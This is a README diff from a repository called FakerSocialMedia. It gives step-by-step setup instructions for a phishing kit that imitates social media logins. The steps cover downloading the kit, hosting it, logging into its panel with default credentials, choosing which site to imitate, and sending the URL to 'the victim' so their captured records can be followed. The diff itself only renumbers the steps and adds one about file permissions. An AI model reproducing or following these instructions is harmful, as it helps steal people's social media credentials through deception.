berkekurnaz/FakerSocialMedia/Readme.md

 1-) Download link on link below <br/> [Download Faker Social Media](http://app.berkekurnaz.com/faker01.zip) <br/>`app.berkekurnaz.com/faker01.zip` <br/>
 2-) Upload the downloaded file to your server <br/>
+3-) Change the permission of the myDatabase file.
+Do as application pool group in the hosting panel. <br/>
-3-) Go to `www.yoursite.com/Panel/Login` and log in by typing `admin` as the user name, `1111` in the password. <br/> 4-) Activate the social media of your choice. <br/>
+4-) Go to `www.yoursite.com/Panel/Login` and log in by typing `admin` as the user name, `1111` in the password. <br/> 5-) Activate the social media of your choice. <br/>
-5-) Send the url to the victim.
+6-) Send the url to the victim.
 Then you can follow the records here.

 #### * Important Note
 The username and password come with an automatic value.
 Please change your username and password for security